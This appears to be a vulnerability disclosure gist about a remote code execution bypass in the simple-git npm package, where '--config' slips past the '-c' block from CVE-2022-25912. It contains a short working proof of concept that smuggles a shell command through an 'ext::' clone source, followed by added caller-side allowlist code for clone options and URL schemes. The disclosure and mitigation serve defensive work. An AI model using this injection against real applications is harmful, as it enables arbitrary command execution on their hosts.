@KKC73

KKC73/PoC.md Secret

Last active March 11, 2026 07:43

Remote Code Execution (RCE) in simple-git

Summary

The mitigation for CVE-2022-25912 appears to block the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.

Vulnerable Code

image

PoC

const simpleGit = require('simple-git')
const myGit = simpleGit()
myGit.clone('ext::sh -c touch% /tmp/pwned_by_kkc% >&2', '/tmp/example-new-repo', ['--config', 'protocol.ext.allow=always'])

Proof of Success

image

Impact

Applications that pass attacker-controlled input into the options argument of the clone function in the simple-git npm package may allow arbitrary command execution on the host running the Node.js process.

Affected versions: >=3.15.0

No patch available

Tested on a Linux system.
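
Because the issue described above is a blocklist that covers `-c` but not `--config`, a caller-side mitigation is to allowlist clone arguments before they reach simple-git. The following is an added example, not part of the original gist or of simple-git; the permitted options, the URL schemes and the `safeClone` helper name are assumptions about what a given application needs, and it accepts only the array form of `options`.

```javascript
// Added example: caller-side guard, not part of simple-git or the gist.
// Assumption: the application needs only these options and URL schemes.
const ALLOWED_FLAGS = new Set(['--bare', '--no-tags', '--single-branch']);
const ALLOWED_VALUED = new Map([
  ['--depth', /^[1-9][0-9]{0,5}$/],
  ['--branch', /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,99}$/],
]);
const ALLOWED_SCHEMES = new Set(['https:', 'ssh:']);

// Accept only "<scheme>://<host>/..." sources. Rejects ext:: and any other
// "<helper>::<address>" form, local paths, and strings starting with "-".
function checkCloneSource(source) {
  let url;
  try {
    url = new URL(source);
  } catch {
    throw new Error('clone source rejected: not an absolute URL');
  }
  if (!ALLOWED_SCHEMES.has(url.protocol) || !url.hostname) {
    throw new Error(`clone source rejected: ${url.protocol} is not an allowed scheme with a host`);
  }
  return url.href; // hand git the parsed form, not the raw input
}

// Exact-match allowlist: every token must be a known flag, or a known
// option followed by (or joined with "=" to) a value matching its pattern.
function checkCloneOptions(options) {
  if (!Array.isArray(options)) throw new TypeError('options must be an array');
  for (let i = 0; i < options.length; i++) {
    const token = options[i];
    if (typeof token !== 'string') throw new TypeError('options must be strings');
    if (ALLOWED_FLAGS.has(token)) continue;
    const eq = token.indexOf('=');
    const name = eq === -1 ? token : token.slice(0, eq);
    const value = eq === -1 ? options[++i] : token.slice(eq + 1);
    const pattern = ALLOWED_VALUED.get(name);
    if (!pattern || typeof value !== 'string' || !pattern.test(value)) {
      throw new Error(`clone option rejected: ${JSON.stringify(token)}`);
    }
  }
  return options;
}

// Validation throws synchronously, before simple-git sees any argument.
function safeClone(git, source, dest, options = []) {
  return git.clone(checkCloneSource(source), dest, checkCloneOptions(options));
}
```

Pass an existing simple-git instance as `git`; anything outside the allowlist fails closed, so option spellings do not have to be enumerated one by one.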
